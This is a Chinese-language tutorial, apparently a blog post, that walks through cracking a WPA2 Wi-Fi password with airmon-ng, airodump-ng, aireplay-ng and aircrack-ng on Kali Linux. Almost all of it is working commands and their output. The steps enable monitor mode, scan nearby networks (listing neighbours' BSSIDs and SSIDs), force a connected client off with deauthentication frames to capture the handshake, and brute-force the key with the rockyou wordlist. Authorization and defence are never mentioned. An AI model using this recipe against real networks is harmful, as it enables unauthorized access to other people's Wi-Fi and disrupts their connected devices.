1.查看网卡名称:iwconfig
有一块 名为wlan0 的无线网卡通过一下命令排除影响因素
root@jkali:~# iwconfig lo no wireless extensions. wlan0 IEEE 802.11 ESSID:"jlysltqx" Mode:Managed Frequency:2.462 GHz Access Point: 28:6C:07:0A:CE:7D Bit Rate=144.4 Mb/s Tx-Power=22 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on Link Quality=63/70 Signal level=-47 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:11 Missed beacon:0
2.通过一下命令排除影响因素
root@jkali:~# service network-manager stop root@jkali:~# airmon-ng check kill Killing these processes: PID Name 6246 wpa_supplicant
3.启动monitor 模式
root@jkali:~# airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wireless 8265 / 8275 (rev 78) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
4.查看是否进入了监控模式
root@jkali:~# iwconfig wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=0 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on lo no wireless extensions.
5.进行抓包
root@jkali:~# airodump-ng wlan0mon CH 4 ][ Elapsed: 12 s ][ 2019-01-30 20:46 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 0C:4B:54:0A:0A:B5 -1 0 2 0 6 -1 WPA <length: 0> 28:6C:07:0A:CE:7D -43 16 0 0 11 130 WPA2 CCMP PSK jlysltqx 0C:6A:BC:56:AB:ED -52 14 1 0 13 130 WPA2 CCMP PSK ChinaNet-fG5b 88:86:03:C6:69:0C -58 18 0 0 7 130 WPA2 CCMP PSK ChinaNet-sWTz E0:28:61:7F:33:14 -73 6 0 0 9 130 WPA2 CCMP PSK ChinaNet-SrPw 50:1D:93:3B:70:E8 -75 16 0 0 8 130 WPA2 CCMP PSK CMCC-er99 8E:25:93:C9:53:EB -75 11 0 0 2 405 WPA2 CCMP PSK Guest_53EB 88:25:93:C9:53:EB -75 12 0 0 2 405 WPA2 CCMP PSK Master BC:D1:77:BD:F1:14 -77 9 0 0 1 270 WPA2 CCMP PSK ¬����2 我们来抓jlysltqx,他的bssid为:28:6C:07:0A:CE:7D,ch 为 11,加密方式为wpa2
6.只抓我们要的wifi 的包
root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa CH 11 ][ Elapsed: 30 s ][ 2019-01-30 20:53 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:6C:07:0A:CE:7D -44 0 288 11125 2262 11 130 WPA2 CCMP PSK jlysltqx BSSID STATION PWR Rate Lost Frames Probe 28:6C:07:0A:CE:7D 3C:B6:B7:E0:4C:05 -28 0e- 0e 1353 11134 28:6C:07:0A:CE:7D 68:3E:34:2A:77:6A -58 0 -24 0 2
7.6中未获取到握手信息,我们把其中一台设备断网,让其重连来航偶去握手信息
aireplay-ng -0 2 -a 28:6C:07:0A:CE:7D -c 3C:B6:B7:E0:4C:05 wlan0mon
8.重新执行6获取握手信息
root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa CH 11 ][ Elapsed: 1 min ][ 2019-01-30 21:03 ][ WPA handshake: 28:6C:07:0A:CE:7D BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:6C:07:0A:CE:7D -42 2 633 4166 4 11 130 WPA2 CCMP PSK jlysltqx BSSID STATION PWR Rate Lost Frames Probe 28:6C:07:0A:CE:7D 3C:B6:B7:E0:4C:05 -29 0e- 0e 6804 4296 jlysltqx 28:6C:07:0A:CE:7D 68:3E:34:2A:77:6A -59 0 -24 0 5
9.查看抓到的包 wpa-04.cap 就是我们抓成功的包
root@jkali:~/kk# ls -lrt 总用量 14172 -rw-r--r-- 1 root root 1755 1月 30 20:50 wpa-01.kismet.netxml -rw-r--r-- 1 root root 591 1月 30 20:50 wpa-01.kismet.csv -rw-r--r-- 1 root root 387 1月 30 20:50 wpa-01.csv -rw-r--r-- 1 root root 9580 1月 30 20:50 wpa-01.cap -rw-r--r-- 1 root root 3887 1月 30 20:52 wpa-02.kismet.netxml -rw-r--r-- 1 root root 592 1月 30 20:52 wpa-02.kismet.csv -rw-r--r-- 1 root root 579 1月 30 20:52 wpa-02.csv -rw-r--r-- 1 root root 47836 1月 30 20:52 wpa-02.cap -rw-r--r-- 1 root root 3902 1月 30 20:53 wpa-03.kismet.netxml -rw-r--r-- 1 root root 600 1月 30 20:53 wpa-03.kismet.csv -rw-r--r-- 1 root root 579 1月 30 20:53 wpa-03.csv -rw-r--r-- 1 root root 10212388 1月 30 20:53 wpa-03.cap -rw-r--r-- 1 root root 4144 1月 30 21:03 wpa-04.kismet.netxml -rw-r--r-- 1 root root 598 1月 30 21:03 wpa-04.kismet.csv -rw-r--r-- 1 root root 587 1月 30 21:03 wpa-04.csv -rw-r--r-- 1 root root 4178189 1月 30 21:03 wpa-04.cap
10.利用字典来进行解密(若字典文件未解压,请自行解压)
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-04.cap
11.破解完成后恢复网络
root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon PHY Interface Driver Chipset phy0 wlan0mon iwlwifi Intel Corporation Wireless 8265 / 8275 (rev 78) (mac80211 station mode vif enabled on [phy0]wlan0) (mac80211 monitor mode vif disabled for [phy0]wlan0mon)